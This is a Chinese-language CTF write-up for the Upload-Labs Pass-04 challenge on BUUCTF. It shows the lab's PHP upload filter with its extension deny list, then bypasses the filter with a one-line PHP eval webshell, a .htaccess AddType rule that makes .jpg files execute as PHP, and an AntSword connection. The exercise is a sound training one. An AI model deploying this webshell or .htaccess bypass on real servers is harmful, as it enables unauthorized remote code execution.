【CTF Web】BUUCTF Upload-Labs-Linux Pass-04 Writeup（文件上传+PHP+.htaccess绕过）

Upload-Labs-Linux

1
点击部署靶机。

简介

upload-labs是一个使用php语言编写的，专门收集渗透测试和CTF中遇到的各种上传漏洞的靶场。旨在帮助大家对上传漏洞有一个全面的了解。目前一共20关，每一关都包含着不同上传方式。

注意

1.每一关没有固定的通关方法，大家不要自限思维！

2.本项目提供的writeup只是起一个参考作用，希望大家可以分享出自己的通关思路。

3.实在没有思路时，可以点击查看提示。

4.如果黑盒情况下，实在做不出，可以点击查看源码。

后续

如在渗透测试实战中遇到新的上传漏洞类型，会更新到upload-labs中。当然如果你也希望参加到这个工作当中，欢迎pull requests给我!

项目地址：https://github.com/c0ny1/upload-labs

任务

上传一个webshell到服务器。

提示

本pass禁止上传.php|.php5|.php4|.php3|.php2|php1|.html|.htm|.phtml|.pHp|.pHp5|.pHp4|.pHp3|.pHp2|pHp1|.Html|.Htm|.pHtml|.jsp|.jspa|.jspx|.jsw|.jsv|.jspf|.jtml|.jSp|.jSpx|.jSpa|.jSw|.jSv|.jSpf|.jHtml|.asp|.aspx|.asa|.asax|.ascx|.ashx|.asmx|.cer|.aSp|.aSpx|.aSa|.aSax|.aScx|.aShx|.aSmx|.cEr|.sWf|.swf后缀文件！

代码

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错！';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建！';
    }
}

---

原理

.htaccess 是一个用于 Apache Web 服务器的配置文件，它允许开发者在没有访问主服务器配置文件的情况下，对自己的目录进行配置。这个文件的名字实际上是 “htaccess”，前面的 “.” 表示它是一个隐藏文件。

.htaccess 文件可以控制很多方面的服务器行为，包括但不限于：

1. URL 重写：可以使用 mod_rewrite 模块将复杂的 URL 转换为更简单、更易于记忆和搜索引擎友好的 URL。

2. 访问控制：可以限制特定 IP 地址或者域名访问网站，或者对特定目录设置密码保护。

3. 自定义错误页面：可以为 HTTP 状态错误（如 404 Not Found）设置自定义的错误页面。

4. MIME 类型：可以设置文件的 MIME 类型，告诉浏览器如何处理特定类型的文件。

5. 性能优化：可以进行一些性能优化的配置，如启用 GZIP 压缩，设置缓存策略等。

虽然 .htaccess 文件提供了很大的灵活性，但是每次请求都需要读取和解析 .htaccess 文件，可能会对服务器性能产生影响。因此，在有访问主服务器配置文件权限的情况下，通常建议直接在主服务器配置文件中进行相应配置。

解法

传个一句话木马，

<?php @eval($_POST['a']); ?>

提示：此文件不允许上传!

创建 .htaccess，写入：

AddType application/x-httpd-php .jpg

上传成功。

右键点击图片，复制图像链接。文件名没有被改，非常好！

http://68779e25-5c47-41a0-995d-2ceb21dcf159.node5.buuoj.cn:81/upload/.htaccess

把一句话木马的后缀改为 .jpg，上传文件。右键点击图片，复制图像链接。

http://68779e25-5c47-41a0-995d-2ceb21dcf159.node5.buuoj.cn:81/upload/a.jpg

通过蚁剑连接：

http://68779e25-5c47-41a0-995d-2ceb21dcf159.node5.buuoj.cn:81/upload/a.jpg

访问根目录。

找到 flag。

Flag

flag{e5c6ec40-25ad-4ef3-bd64-22ae1e9cd061}

---

声明

本博客上发布的所有关于网络攻防技术的文章，仅用于教育和研究目的。所有涉及到的实验操作都在虚拟机或者专门设计的靶机上进行，并且严格遵守了相关法律法规。

博主坚决反对任何形式的非法黑客行为，包括但不限于未经授权的访问、攻击或破坏他人的计算机系统。博主强烈建议每位读者在学习网络攻防技术时，必须遵守法律法规，不得用于任何非法目的。对于因使用这些技术而导致的任何后果，博主不承担任何责任。